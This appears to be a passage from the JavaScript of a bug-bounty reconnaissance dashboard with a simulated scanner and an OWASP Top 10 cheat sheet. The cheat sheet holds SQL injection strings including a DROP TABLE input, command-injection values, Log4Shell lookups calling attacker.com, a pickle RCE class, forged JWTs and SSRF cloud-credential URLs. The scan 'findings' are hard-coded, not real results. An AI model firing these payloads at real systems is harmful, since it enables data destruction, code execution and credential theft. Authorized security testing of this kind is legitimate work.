VaultOcean Recon Intelligence Center
PentX v1.0 — VaultOcean Recon Platform
','Test for command injection with ; id, | whoami'],payloads:["' OR '1'='1\n' OR '1'='1' --\n' UNION SELECT null,table_name FROM information_schema.tables --\n1; DROP TABLE users --",'# Time-based blind SQLi\n1 AND SLEEP(5)--\n1\' AND SLEEP(5)--\n1 AND (SELECT * FROM (SELECT(SLEEP(5)))a)--','# XSS payloads\n\n\n','# Command injection\n; id\n| whoami\n` id `\n$(id)'],report:'## Vulnerability\nSQL Injection in /api/search parameter\n\n## Impact\nFull database read, potential RCE\n\n## Steps to Reproduce\n1. Navigate to /api/search?q=test\n2. Replace test with \' OR \'1\'=\'1\n3. Observe SQL error / data dump'}, {num:'04',title:'Insecure Design',severity:'high',bounty:'$300–$5,000',desc:'Risks related to design and architectural flaws. Insecure design is not something that can be fixed by perfect implementation.',steps:['Test rate limiting on login, password reset, OTP endpoints','Check if password reset tokens expire','Test for predictable tokens (sequential IDs, timestamps)','Check if email enumeration is possible on reset flow','Test business logic flaws (negative prices, free upgrades)'],payloads:['# Rate limiting test (Burp Intruder)\nPOST /api/auth/login\n{"username":"victim@test.com","password":"§brute§"}','# Password reset token entropy\nPOST /api/auth/reset\n{"email":"victim@test.com"}\n# Token: reset_1234567890 (timestamp-based!)','# Business logic\nPOST /api/checkout\n{"item_id":1,"quantity":-1,"price":-99.99}'],report:'## Vulnerability\nInsecure Password Reset - Predictable Token\n\n## Impact\nAccount takeover for any user\n\n## Steps to Reproduce\n1. Request reset for target account\n2. Analyze token pattern (timestamp-based)\n3. 
Predict token for victim account'}, {num:'05',title:'Security Misconfiguration',severity:'high',bounty:'$200–$8,000',desc:'Improperly configured permissions, unnecessary features enabled, default accounts, overly informative error messages.',steps:['Check for default credentials on admin panels','Test directory traversal on web server','Look for exposed .git, .env, .htaccess files','Check for verbose error messages revealing stack traces','Test for open cloud storage buckets'],payloads:['# Directory listing\nGET /backup/\nGET /.git/config\nGET /.env\nGET /admin/\nGET /phpinfo.php','# Cloud storage\nhttps://s3.amazonaws.com/target-bucket/\nhttps://target.blob.core.windows.net/container/\n# Tools: bucket-finder, S3Scanner','# Default creds\nadmin:admin\nadmin:password\nroot:root\nadmin:123456'],report:'## Vulnerability\nExposed .git Directory\n\n## Impact\nFull source code disclosure, credentials exposed\n\n## Steps to Reproduce\n1. Navigate to https://target.com/.git/config\n2. Observe git repository information\n3. Use git-dumper to extract full source'}, {num:'06',title:'Vulnerable and Outdated Components',severity:'high',bounty:'$300–$15,000',desc:'Using components with known vulnerabilities including libraries, frameworks, and other software modules.',steps:['Identify all software versions from headers and source','Cross-reference with CVE databases','Check npm audit, pip check for known vulns','Look for jQuery < 1.6.3, Struts, Log4j versions','Test identified CVEs against the application'],payloads:['# Version detection\nX-Powered-By: PHP/7.2.0 (EOL!)\nServer: Apache/2.2.3 (CVE-2017-9788)\n# Response headers reveal versions','# Log4Shell\n${jndi:ldap://attacker.com/a}\n${${lower:j}${lower:n}${lower:d}${lower:i}:ldap://attacker.com/a}','# Shodan dorks\nhttp.component:jquery version:<3\nhttp.component:"Apache Struts"'],report:'## Vulnerability\nOutdated Apache Struts - CVE-2017-5638\n\n## Impact\nRemote Code Execution\n\n## Steps to Reproduce\n1. 
Identify Struts version from headers\n2. Craft malicious Content-Type header\n3. Execute OS commands'}, {num:'07',title:'Identification and Authentication Failures',severity:'critical',bounty:'$500–$20,000',desc:'Confirmation of the user\'s identity, authentication, and session management is critical. Weaknesses include brute force, weak passwords, exposed session IDs.',steps:['Test for account lockout after failed attempts','Check if session tokens are invalidated on logout','Test for session fixation','Look for JWT algorithm confusion (none, RS256→HS256)','Check if MFA can be bypassed'],payloads:['# JWT none algorithm attack\neyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.','# JWT RS256 to HS256 confusion\n# Sign with public key as HMAC secret','# Session fixation\nGET /login?PHPSESSID=attacker_controlled_id','# Brute force wordlist\nrockyou.txt, SecLists/Passwords/Common-Credentials/'],report:'## Vulnerability\nJWT Algorithm Confusion - None Attack\n\n## Impact\nAuthentication bypass, access as any user\n\n## Steps to Reproduce\n1. Decode JWT token\n2. Change alg to "none"\n3. Remove signature\n4. 
Access /api/admin'}, {num:'08',title:'Software and Data Integrity Failures',severity:'high',bounty:'$500–$10,000',desc:'Code and infrastructure that does not protect against integrity violations, including insecure deserialization.',steps:['Check if app uses auto-update without integrity checks','Test serialized objects in cookies/parameters','Look for YAML, pickle, XML deserialization','Check SRI (Subresource Integrity) on CDN scripts','Test for git/CI pipeline injection'],payloads:['# PHP serialization attack\nO:8:"stdClass":1:{s:4:"role";s:5:"admin";}\n# URL encoded:\nO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A4%3A%22role%22%3Bs%3A5%3A%22admin%22%3B%7D','# Python pickle RCE\nimport pickle, os\nclass Exploit(object):\n def __reduce__(self):\n return (os.system, ("id",))','# Java deserialization (ysoserial)\njava -jar ysoserial.jar CommonsCollections1 "id"'],report:'## Vulnerability\nInsecure Deserialization in session cookie\n\n## Impact\nRemote Code Execution\n\n## Steps to Reproduce\n1. Decode base64 session cookie\n2. Identify PHP serialized object\n3. Craft malicious serialized payload\n4. 
Observe RCE'}, {num:'09',title:'Security Logging and Monitoring Failures',severity:'medium',bounty:'$100–$2,000',desc:'Insufficient logging and monitoring, including missing detection and response to active breaches.',steps:['Test if failed logins are logged (check timing)','Attempt brute force and see if account gets locked','Check if audit logs are accessible to regular users','Test log injection with newlines in user input','Verify if security events trigger alerts'],payloads:['# Log injection\nGET /api/login?user=admin%0AUser%3A+injected_log_entry\n# Newline injection in log files','# Check log exposure\nGET /logs/\nGET /var/log/\nGET /admin/logs\nGET /api/audit-log','# Timing analysis for blind logging\n# Multiple failed logins - measure if response time changes'],report:'## Vulnerability\nLog Injection via User Input\n\n## Impact\nForge log entries, hide attacker activity\n\n## Steps to Reproduce\n1. Send request with newline characters in User-Agent\n2. Observe forged entries in application logs'}, {num:'10',title:'Server-Side Request Forgery (SSRF)',severity:'critical',bounty:'$1,000–$30,000',desc:'SSRF flaws occur when an application fetches a remote resource based on user-supplied input without validating the URL.',steps:['Find URL parameters: url=, fetch=, src=, path=, load=','Test with http://127.0.0.1/admin','Try cloud metadata: http://169.254.169.254/','Attempt internal network scanning','Test DNS rebinding and SSRF bypass techniques'],payloads:['# AWS metadata\nhttp://169.254.169.254/latest/meta-data/\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/\n# GCP metadata\nhttp://metadata.google.internal/computeMetadata/v1/','# SSRF bypass\nhttp://127.0.0.1\nhttp://localhost\nhttp://[::1]\nhttp://0.0.0.0\nhttp://2130706433 (127.0.0.1 decimal)','# Internal port scan\nhttp://127.0.0.1:22\nhttp://127.0.0.1:3306\nhttp://127.0.0.1:6379 (Redis)\nhttp://127.0.0.1:8080 (Admin panel)'],report:'## Vulnerability\nSSRF via url parameter\n\n## 
Impact\nAccess to AWS metadata, internal services, potential RCE\n\n## Steps to Reproduce\n1. Navigate to /api/fetch?url=http://example.com\n2. Replace with http://169.254.169.254/latest/meta-data/\n3. Observe AWS credentials in response'}, ], attackChains:[ {title:'Subdomain Takeover → Phishing',severity:'critical',bounty:'$3,000–$8,000',steps:['Find dangling CNAME via Subdomain Enum','Verify unclaimed hosting provider','Register account on provider','Upload phishing page to subdomain','Harvest victim credentials'],desc:'Dangling CNAME record points to unclaimed cloud service. Attacker registers on provider and hosts malicious content on victim\'s subdomain, bypassing browser security policies.'}, {title:'Exposed .env → Credential Stuffing → Admin ATO',severity:'critical',bounty:'$5,000–$25,000',steps:['Find .env via path enumeration','Extract DB credentials + API keys','Access database directly','Dump hashed passwords','Crack hashes → admin account takeover'],desc:'Exposed environment file reveals database credentials and API keys. Attacker accesses database, extracts and cracks password hashes, and takes over admin account.'}, {title:'CORS Wildcard → CSRF → Account Takeover',severity:'high',bounty:'$2,000–$10,000',steps:['Identify CORS: Access-Control-Allow-Origin: *','Craft malicious HTML page','Victim visits attacker page','JS makes authenticated request with victim\'s cookie','Exfiltrate session token'],desc:'Overly permissive CORS policy allows any origin to make credentialed requests. Combined with XSS or social engineering, attacker can steal authenticated session data.'}, {title:'JWT None Algo → Privilege Escalation → Admin RCE',severity:'critical',bounty:'$10,000–$50,000',steps:['Capture valid JWT token','Change alg to "none" in header','Set role to "admin" in payload','Remove signature','Access admin panel → find RCE vector'],desc:'JWT library accepts "none" algorithm, allowing attacker to forge tokens without a secret. 
Admin panel contains RCE vulnerability only reachable with admin privileges.'}, {title:'IDOR → PII Dump → GDPR Violation',severity:'high',bounty:'$1,500–$8,000',steps:['Find user object with numeric ID','Enumerate IDs 1–10000 via automation','Collect names, emails, addresses','Demonstrate data of 10k+ users','Report as GDPR/privacy violation'],desc:'Insecure Direct Object Reference on user profile endpoint allows unauthenticated or low-privileged enumeration of all user PII, constituting a significant data breach.'}, ], customChains:[], }; // ===== NAVIGATION ===== function showPage(id, tab) { document.querySelectorAll('.page').forEach(p=>p.classList.remove('active')); document.querySelectorAll('.nav-tab').forEach(t=>t.classList.remove('active')); document.getElementById('page-'+id).classList.add('active'); if(tab) tab.classList.add('active'); } // ===== CLOCK ===== function updateClock() { const now = new Date(); document.getElementById('hdr-clock').textContent = now.toUTCString().replace(' GMT','') + ' UTC'; document.getElementById('dash-date').textContent = now.toLocaleDateString('en-US',{weekday:'long',year:'numeric',month:'long',day:'numeric'}); } setInterval(updateClock,1000); updateClock(); // ===== INTEL FEED ===== function addIntel(msg, type='info') { const feed = document.getElementById('intel-feed'); const time = new Date().toTimeString().slice(0,8); const dotClass = type==='critical'?'dot-critical':type==='high'?'dot-high':'dot-info'; const item = document.createElement('div'); item.className = 'intel-item'; item.innerHTML = `
${time}
${msg}
`; feed.insertBefore(item, feed.firstChild); while(feed.children.length > 20) feed.removeChild(feed.lastChild); } // ===== TERMINAL ===== let termLines = []; function tWrite(line, cls='') { const t = document.getElementById('recon-terminal'); const cursor = t.querySelector('.t-cursor'); if(cursor) cursor.parentElement.remove(); const div = document.createElement('div'); div.className = 't-line ' + cls; div.innerHTML = line; t.appendChild(div); const cur = document.createElement('div'); cur.className = 't-line'; cur.innerHTML = ''; t.appendChild(cur); t.scrollTop = t.scrollHeight; } // ===== SCAN ENGINE ===== const scanModules = [ {id:'dns',label:'DNS Intelligence'}, {id:'subdomain',label:'Subdomain Enum'}, {id:'ssl',label:'SSL/TLS Analysis'}, {id:'tech',label:'Tech Fingerprint'}, {id:'cve',label:'CVE Intelligence'}, {id:'headers',label:'Security Headers'}, {id:'js',label:'JS Intelligence'}, {id:'wayback',label:'Wayback Mining'}, {id:'ip',label:'IP Intelligence'}, {id:'email',label:'Email Security'}, ]; let scanStep = 0; let scanTarget = ''; let scanTimer = null; let scanFindings = []; const signaturesDB = [ {id:'missing_hsts',sev:'high',title:'Missing HSTS Header',desc:'HTTP Strict Transport Security is not configured. Attackers can perform SSL stripping attacks to downgrade HTTPS connections to HTTP, intercepting sensitive data.',verify:'1. Check response headers: curl -I https://target.com\n2. Look for Strict-Transport-Security header\n3. Use https://hstspreload.org to verify',bounty:'$200–$2,000',confidence:95,module:'headers'}, {id:'missing_csp',sev:'high',title:'Missing Content-Security-Policy',desc:'No CSP header detected. XSS attacks are significantly amplified without CSP. Attackers can inject and execute arbitrary JavaScript, stealing cookies and session tokens.',verify:'1. Open DevTools → Network\n2. Check response headers for Content-Security-Policy\n3. 
Test XSS: ',bounty:'$300–$3,000',confidence:95,module:'headers'}, {id:'cors_wildcard',sev:'critical',title:'CORS Wildcard Origin',desc:'Access-Control-Allow-Origin: * combined with credentials allows any website to make authenticated cross-origin requests. Attackers can steal session data from victim browsers.',verify:'1. Send request with Origin: https://evil.com\n2. Check if response allows the origin with credentials\n3. Test: fetch("https://api.target.com/profile",{credentials:"include"})',bounty:'$1,000–$10,000',confidence:90,module:'headers'}, {id:'tls_old',sev:'high',title:'Deprecated TLS Protocol (TLS 1.0/1.1)',desc:'Server supports TLS 1.0 or 1.1, deprecated protocols with known cryptographic weaknesses. Vulnerable to POODLE, BEAST, and CRIME attacks.',verify:'1. nmap --script ssl-enum-ciphers -p 443 target.com\n2. testssl.sh target.com\n3. Check for TLSv1.0 or TLSv1.1 in results',bounty:'$200–$1,500',confidence:85,module:'ssl'}, {id:'xframe_missing',sev:'medium',title:'Missing X-Frame-Options',desc:'Pages can be embedded in iframes on attacker-controlled sites, enabling clickjacking attacks. Victims can be tricked into clicking hidden buttons performing unintended actions.',verify:'1. curl -I https://target.com\n2. Check for X-Frame-Options: DENY or SAMEORIGIN\n3. Test: ',bounty:'$100–$500',confidence:95,module:'headers'}, {id:'server_version',sev:'medium',title:'Server Version Disclosed',desc:'Server header reveals exact software version, allowing attackers to target version-specific CVEs without additional probing.',verify:'1. curl -I https://target.com\n2. Look for Server: Apache/2.4.x or nginx/1.x.x\n3. Cross-reference with CVE databases',bounty:'$100–$500',confidence:95,module:'headers'}, {id:'spf_softfail',sev:'medium',title:'SPF SoftFail (~all)',desc:'SPF record uses softfail (~all) instead of hardfail (-all). Emails from unauthorized senders may still be delivered, enabling email spoofing and phishing attacks.',verify:'1. 
dig TXT target.com | grep spf\n2. Look for "~all" at end of record\n3. Test with SPF record checker tools',bounty:'$100–$800',confidence:90,module:'email'}, {id:'missing_dmarc',sev:'high',title:'Missing DMARC Record',desc:'No DMARC policy configured. Without DMARC, attackers can spoof the domain in email From headers, bypassing SPF and DKIM checks.',verify:'1. dig TXT _dmarc.target.com\n2. Expected: v=DMARC1; p=reject\n3. Use mxtoolbox.com to verify',bounty:'$200–$2,000',confidence:95,module:'email'}, {id:'subdomains_found',sev:'info',title:'Subdomains Discovered',desc:'Multiple subdomains identified. Each represents additional attack surface. Check for development environments, staging servers, and deprecated services.',verify:'1. Test each subdomain for unique vulnerabilities\n2. Check for default credentials on staging\n3. Look for internal tools exposed via DNS',bounty:'$0–$500',confidence:99,module:'subdomain'}, {id:'wayback_old_endpoints',sev:'medium',title:'Historical Endpoints Found (Wayback)',desc:'Wayback Machine contains archived versions of the application revealing old API endpoints, admin panels, and deprecated functionality that may still be accessible.',verify:'1. Visit web.archive.org/web/*/target.com\n2. Look for /api/v1/, /admin/, /debug/ URLs\n3. Test if old endpoints respond on current server',bounty:'$200–$3,000',confidence:80,module:'wayback'}, {id:'js_secrets',sev:'critical',title:'Potential Secrets in JavaScript',desc:'JavaScript files contain patterns matching API keys, tokens, or credentials. These can be used for unauthorized access to third-party services or internal APIs.',verify:'1. View page source, search for key/secret/token/password patterns\n2. Check JS bundle files\n3. Attempt to use found credentials',bounty:'$500–$15,000',confidence:75,module:'js'}, {id:'cert_expiry',sev:'low',title:'SSL Certificate Expiring Soon',desc:'SSL certificate will expire within 30 days. 
Expiration causes browser warnings and service disruption.',verify:'1. echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates\n2. Check notAfter date',bounty:'$0–$200',confidence:98,module:'ssl'}, ]; function startScan() { const domain = document.getElementById('recon-domain').value.trim(); if(!domain){alert('Please enter a target domain');return;} if(state.scanning){return;} const enabledModuleIds = state.modules.filter(m=>m.enabled).map(m=>m.id); state.scanning = true; scanTarget = domain.replace(/^https?:\/\//,'').replace(/\//,''); scanStep = 0; scanFindings = []; document.getElementById('scan-btn').style.display='none'; document.getElementById('stop-btn').style.display=''; // Clear terminal document.getElementById('recon-terminal').innerHTML = ''; tWrite(`[+] PentX Scan Engine v1.0 — VaultOcean`,'t-green-text'); tWrite(`[*] Target: ${scanTarget}`,'t-dim'); tWrite(`[*] Profile: ${document.getElementById('scan-profile').value}`,'t-dim'); tWrite(`[*] Modules: ${enabledModuleIds.length} enabled`,'t-dim'); tWrite(`[*] Starting reconnaissance...`,'t-green-text'); tWrite(''); // Build module progress const mpl = document.getElementById('module-progress-list'); mpl.innerHTML = ''; const activeModules = scanModules.filter(m=>enabledModuleIds.includes(m.id)); activeModules.forEach(m=>{ const div = document.createElement('div'); div.className = 'module-progress'; div.id = 'mp-'+m.id; div.innerHTML = `${m.label}PENDING`; mpl.appendChild(div); const pb = document.createElement('div'); pb.className = 'progress-bar'; pb.innerHTML = `
`; mpl.appendChild(pb); }); runNextModule(activeModules, 0, scanTarget); addIntel(`Scan started on ${scanTarget}`, 'info'); } function runNextModule(modules, idx, domain) { if(!state.scanning || idx >= modules.length) { finishScan(domain); return; } const mod = modules[idx]; const statusEl = document.getElementById('mps-'+mod.id); const fillEl = document.getElementById('mpf-'+mod.id); if(statusEl) statusEl.className = 'module-status status-running'; if(statusEl) statusEl.textContent = 'RUNNING'; tWrite(`[*] Running ${mod.label}...`,'t-dim'); simulateModule(mod.id, domain, (lines, findings) => { lines.forEach(l=>tWrite(l.text, l.cls||'')); findings.forEach(f=>scanFindings.push(f)); if(statusEl){ statusEl.className='module-status status-done'; statusEl.textContent='DONE'; } if(fillEl) fillEl.style.width='100%'; setTimeout(()=>runNextModule(modules, idx+1, domain), 300); }); } function simulateModule(modId, domain, cb) { const delay = 800 + Math.random()*1200; setTimeout(()=>{ const lines = []; const findings = []; switch(modId){ case 'dns': lines.push({text:` A ${domain} → 104.21.${ri(10,200)}.${ri(1,255)}`}); lines.push({text:` MX mail.${domain} (priority 10)`}); lines.push({text:` NS ns1.cloudflare.com, ns2.cloudflare.com`}); lines.push({text:` TXT v=spf1 include:_spf.google.com ~all`,'cls':'t-yellow-text'}); lines.push({text:` [!] 
SPF SoftFail detected`,'cls':'t-yellow-text'}); findings.push(makeF('spf_softfail')); break; case 'subdomain': const subs = [`api.${domain}`,`mail.${domain}`,`dev.${domain}`,`staging.${domain}`,`admin.${domain}`,`vpn.${domain}`]; subs.forEach(s=>lines.push({text:` [+] ${s}`,'cls':'t-green-text'})); lines.push({text:` [*] ${subs.length} subdomains discovered`}); findings.push(makeF('subdomains_found')); updateCounter('ss-subs', subs.length); break; case 'ssl': lines.push({text:` Certificate: *.${domain} (Let's Encrypt)`}); lines.push({text:` Expires: ${getExpiry(25)} days remaining`}); lines.push({text:` TLS 1.0: ENABLED`,'cls':'t-red-text'}); lines.push({text:` TLS 1.2: enabled`}); lines.push({text:` TLS 1.3: enabled`}); lines.push({text:` [!] Deprecated TLS 1.0 detected`,'cls':'t-red-text'}); findings.push(makeF('tls_old')); break; case 'tech': lines.push({text:` Server: nginx/1.18.0`}); lines.push({text:` X-Powered-By: PHP/7.4.3`}); lines.push({text:` CMS: WordPress 5.8`}); lines.push({text:` WAF: Cloudflare`}); lines.push({text:` [!] 
Server version disclosed`,'cls':'t-yellow-text'}); findings.push(makeF('server_version')); break; case 'cve': lines.push({text:` PHP 7.4.3 → CVE-2021-21706 (CVSS 5.3)`,'cls':'t-yellow-text'}); lines.push({text:` WordPress 5.8 → CVE-2021-39203 (CVSS 4.3)`,'cls':'t-yellow-text'}); lines.push({text:` nginx/1.18.0 → CVE-2021-23017 (CVSS 7.7)`,'cls':'t-red-text'}); break; case 'headers': lines.push({text:` Strict-Transport-Security: MISSING`,'cls':'t-red-text'}); lines.push({text:` Content-Security-Policy: MISSING`,'cls':'t-red-text'}); lines.push({text:` X-Frame-Options: MISSING`,'cls':'t-yellow-text'}); lines.push({text:` CORS: Access-Control-Allow-Origin: *`,'cls':'t-red-text'}); lines.push({text:` X-Content-Type-Options: nosniff ✓`}); findings.push(makeF('missing_hsts')); findings.push(makeF('missing_csp')); findings.push(makeF('xframe_missing')); findings.push(makeF('cors_wildcard')); break; case 'js': lines.push({text:` Scanning bundle.js...`}); lines.push({text:` [!] Potential API key pattern found: AIzaSy...`,'cls':'t-red-text'}); lines.push({text:` [!] 
Endpoint found: /api/v1/admin/users`,'cls':'t-yellow-text'}); lines.push({text:` Source map exposed: main.js.map`,'cls':'t-yellow-text'}); findings.push(makeF('js_secrets')); break; case 'wayback': lines.push({text:` [+] /api/v1/users (2019)`}); lines.push({text:` [+] /admin/dashboard.php (2020)`,'cls':'t-yellow-text'}); lines.push({text:` [+] /debug/phpinfo.php (2018)`,'cls':'t-red-text'}); lines.push({text:` [*] 47 historical URLs found`}); findings.push(makeF('wayback_old_endpoints')); break; case 'ip': lines.push({text:` IP: 104.21.${ri(10,200)}.${ri(1,255)}`}); lines.push({text:` ASN: AS13335 (Cloudflare)`}); lines.push({text:` CDN: Cloudflare detected`}); lines.push({text:` Origin IP candidates: checking...`}); break; case 'email': lines.push({text:` SPF: v=spf1 ~all (SoftFail)`,'cls':'t-yellow-text'}); lines.push({text:` DKIM: MISSING`,'cls':'t-red-text'}); lines.push({text:` DMARC: MISSING`,'cls':'t-red-text'}); lines.push({text:` [!] Domain spoofable`,'cls':'t-red-text'}); findings.push(makeF('missing_dmarc')); break; } cb(lines, findings); }, delay); } function makeF(id) { const sig = signaturesDB.find(s=>s.id===id); if(!sig) return null; return {...sig, target: scanTarget, time: new Date().toTimeString().slice(0,8)}; } function finishScan(domain) { state.scanning = false; document.getElementById('scan-btn').style.display=''; document.getElementById('stop-btn').style.display='none'; const validFindings = scanFindings.filter(Boolean); state.findings.push(...validFindings); tWrite(''); tWrite(`[+] Scan complete. 
${validFindings.length} findings.`, 't-green-text'); state.scans++; updateStats(validFindings); renderFindings(validFindings); addToRecents(domain, validFindings); addIntel(`Scan complete on ${domain} — ${validFindings.filter(f=>f.sev==='critical').length} critical, ${validFindings.filter(f=>f.sev==='high').length} high`, validFindings.some(f=>f.sev==='critical')?'critical':'high'); updateReportCVSS(validFindings); } function stopScan() { state.scanning = false; document.getElementById('scan-btn').style.display=''; document.getElementById('stop-btn').style.display='none'; tWrite('[!] Scan stopped by user.','t-red-text'); } function updateStats(findings) { document.getElementById('stat-scans').textContent = state.scans; const allF = state.findings; document.getElementById('stat-critical').textContent = allF.filter(f=>f.sev==='critical').length; document.getElementById('stat-high').textContent = allF.filter(f=>f.sev==='high').length; document.getElementById('stat-total').textContent = allF.length; document.getElementById('ss-domains').textContent = state.scans; document.getElementById('ss-med').textContent = allF.filter(f=>f.sev==='medium').length; document.getElementById('ss-low').textContent = allF.filter(f=>f.sev==='low'||f.sev==='info').length; } function updateCounter(id, val) { const el = document.getElementById(id); if(el) el.textContent = parseInt(el.textContent||0) + val; } function addToRecents(domain, findings) { state.targets.unshift({domain, findings}); if(state.targets.length > 10) state.targets.pop(); const rt = document.getElementById('recent-targets'); rt.innerHTML = state.targets.map(t=>`
${t.domain}
${t.findings.filter(f=>f.sev==='critical').length} CRIT ${t.findings.filter(f=>f.sev==='high').length} HIGH ${t.findings.length} TOTAL
`).join(''); } function renderFindings(findings) { const list = document.getElementById('findings-list'); if(!findings.length){ list.innerHTML='
No findings.
'; return; } list.innerHTML = findings.map((f,i)=> f ? `
${f.sev} ${f.title} ${f.confidence}% conf ${f.bounty}

${f.desc}

How to Verify:
${f.verify.replace(/\n/g,'
')}
Module:${f.module}Bounty Potential:${f.bounty}
` : '').join(''); } function toggleFinding(i) { document.getElementById('finding-'+i).classList.toggle('open'); } function filterFindings(sev, btn) { document.querySelectorAll('.filter-btn').forEach(b=>b.classList.remove('active')); btn.classList.add('active'); const items = document.querySelectorAll('.finding'); items.forEach(el=>{ el.style.display = (sev==='all'||el.classList.contains(sev)) ? '' : 'none'; }); } // ===== QUICK SCAN ===== function quickScan() { const d = document.getElementById('qs-domain').value.trim(); if(!d){alert('Enter a domain');return;} document.getElementById('recon-domain').value = d; showPage('recon', document.querySelectorAll('.nav-tab')[1]); setTimeout(startScan, 200); } // ===== MODULES PAGE ===== function renderModules() { const list = document.getElementById('modules-list'); list.innerHTML = state.modules.map((m,i)=>`
${m.name}
${m.desc}
${m.tags.map(t=>`${t}`).join('')}
`).join(''); } function toggleModule(id, val) { const m = state.modules.find(m=>m.id===id); if(m) m.enabled = val; const card = document.getElementById('mcard-'+id); if(card){ card.classList.toggle('enabled',val); card.classList.toggle('disabled',!val); } } function toggleAllModules(val) { state.modules.forEach(m=>m.enabled=val); renderModules(); } // ===== OWASP PAGE ===== function renderOWASP() { const list = document.getElementById('owasp-list'); list.innerHTML = state.owaspData.map((o,i)=>`
A${o.num}
${o.title}
${o.severity}
${o.bounty}

${o.desc}

Testing Steps

${o.steps.map((s,j)=>`
${j+1}
${s}
`).join('')}

Payloads & Commands

${escHtml(o.payloads.join('\n\n'))}

Bounty Estimate

${o.bounty}

Report Template

${escHtml(o.report)}
`).join(''); } function toggleOWASP(i) { document.getElementById('owasp-'+i).classList.toggle('open'); } // ===== DUAL ACCOUNT ===== function renderIDORChecklist() { const items = [ 'Test GET /api/users/ with your token', 'Test GET /api/orders/', 'Test PUT /api/profile/ with your token', 'Test DELETE /api/posts/', 'Test file download: /download?id=', 'Test POST requests — swap user_id in body', 'Test indirect IDOR via email/username instead of ID', 'Test IDOR in pagination: /api/messages?user=', 'Test second-order IDOR (store A, retrieve B)', 'Test IDOR after role change', ]; document.getElementById('idor-checklist').innerHTML = items.map(t=>`
${t}
`).join(''); } function analyzeTokens() { const a = document.getElementById('token-a').value.trim(); const b = document.getElementById('token-b').value.trim(); const out = document.getElementById('token-analysis'); if(!a && !b){ out.innerHTML='
Paste tokens to analyze.
'; return; } let html = '
'; const analyzeToken = (token, label) => { const issues = []; if(token.startsWith('eyJ')) issues.push({t:'JWT Token detected',c:'text-blue'}); if(token.length < 32) issues.push({t:'Short token — weak entropy possible',c:'text-critical'}); if(/^[0-9]+$/.test(token)) issues.push({t:'Numeric-only token — sequential/predictable',c:'text-critical'}); if(token.includes('=')) issues.push({t:'Base64 encoded — may contain raw data',c:'text-yellow'}); if(issues.length === 0) issues.push({t:'No obvious issues detected',c:'text-dim'}); return `
${label}: ${issues.map(i=>`${i.t}`).join(' | ')}
`; }; if(a) html += analyzeToken(a,'A'); if(b) html += analyzeToken(b,'B'); if(a && b && a === b) html += '
⚠ IDENTICAL TOKENS — possible session not invalidated or shared session bug
'; html += '
'; out.innerHTML = html; } function decodeJWT() { const jwt = document.getElementById('jwt-input').value.trim(); const out = document.getElementById('jwt-output'); if(!jwt || !jwt.startsWith('eyJ')){ out.style.display='block'; out.textContent='Invalid JWT. Must start with eyJ...'; return; } try { const parts = jwt.split('.'); if(parts.length < 2){ out.style.display='block'; out.textContent='Invalid JWT structure.'; return; } const decB64 = s => { s = s.replace(/-/g,'+').replace(/_/g,'/'); while(s.length%4) s+='='; return JSON.parse(atob(s)); }; const header = decB64(parts[0]); const payload = decB64(parts[1]); const sig = parts[2] || 'MISSING'; let warn = ''; if(header.alg === 'none') warn += '\n⚠ CRITICAL: Algorithm "none" — token not verified!\n'; if(header.alg === 'HS256') warn += '\n⚠ Check for RS256→HS256 confusion attack\n'; if(!parts[2]) warn += '\n⚠ CRITICAL: No signature — forged token!\n'; if(payload.exp && payload.exp < Date.now()/1000) warn += '\n⚠ Token EXPIRED\n'; if(payload.iat && (Date.now()/1000 - payload.iat) > 86400*30) warn += '\n⚠ Token is very old (30+ days)\n'; out.style.display='block'; out.innerHTML = `HEADER:\n${JSON.stringify(header,null,2)}\n\nPAYLOAD:\n${JSON.stringify(payload,null,2)}\n\nSIGNATURE:\n${sig}${warn?`\n${warn}`:''}`; } catch(e) { out.style.display='block'; out.textContent = 'Failed to decode: ' + e.message; } } function compareResponses() { const a = document.getElementById('resp-a').value.trim(); const b = document.getElementById('resp-b').value.trim(); const out = document.getElementById('idor-result'); if(!a||!b){ out.innerHTML='
Paste both responses to compare.
'; return; } if(a===b) { out.innerHTML = `
🚨 IDOR CONFIRMED — Responses are IDENTICAL
Account A received the same data as Account B.
This indicates access control is NOT enforced on this endpoint.

Next steps:
1. Screenshot both requests and responses in Burp Suite
2. Document the endpoint and parameters
3. Estimate impact (PII? Financial? Admin data?)
4. Calculate CVSS score
5. Submit report immediately
`; addIntel('IDOR confirmed — identical responses detected','critical'); state.findings.push({sev:'critical',title:'IDOR — Identical API Responses (Dual Account)',desc:'Two different account sessions received identical API responses, confirming Insecure Direct Object Reference vulnerability.',verify:'Compare responses from Account A and Account B tokens on same endpoint.',bounty:'$1,000–$10,000',confidence:99,module:'dual-account',target:'manual',time:new Date().toTimeString().slice(0,8)}); updateStats([]); }
  else {
    // Try to find partial overlap (only meaningful when both responses parse as JSON objects)
    let aData, bData;
    try { aData = JSON.parse(a); bData = JSON.parse(b); } catch(e){}
    if(aData && bData && typeof aData === 'object' && typeof bData === 'object') {
      const aKeys = Object.keys(aData);
      // a field counts as shared when both responses carry the same value for it; the object's own id is ignored
      const sharedData = aKeys.filter(k=>JSON.stringify(aData[k])===JSON.stringify(bData[k]) && k!=='id');
      if(sharedData.length > aKeys.length * 0.7) { out.innerHTML = `
⚠ POTENTIAL IDOR — ${sharedData.length}/${aKeys.length} fields match. Shared fields: ${sharedData.join(', ')}
`; return; } } out.innerHTML = `
✓ Responses differ — access control appears to be working on this endpoint.
Continue testing other endpoints.
`; }
function analyzeCookie(val) {
  const cookie = val || document.getElementById('cookie-input').value.trim();
  const out = document.getElementById('cookie-result');
  if(!cookie){ out.innerHTML=''; return; }
  const flags = {
    secure: /;\s*Secure\b/i.test(cookie),
    httponly: /;\s*HttpOnly\b/i.test(cookie),
    samesite: /;\s*SameSite=(Strict|Lax|None)/i.exec(cookie),
    domain: /;\s*Domain=([^;]+)/i.exec(cookie),
    path: /;\s*Path=([^;]+)/i.exec(cookie),
    expires: /;\s*Expires=([^;]+)/i.exec(cookie),
    maxage: /;\s*Max-Age=(\d+)/i.exec(cookie),
  };
  // the attribute is matched case-insensitively, so normalise the value before comparing (SameSite=none is valid)
  const sameSiteVal = flags.samesite ? flags.samesite[1].toLowerCase() : null;
  const issues = [];
  if(!flags.secure) issues.push({sev:'high',msg:'Missing Secure flag — cookie sent over HTTP'});
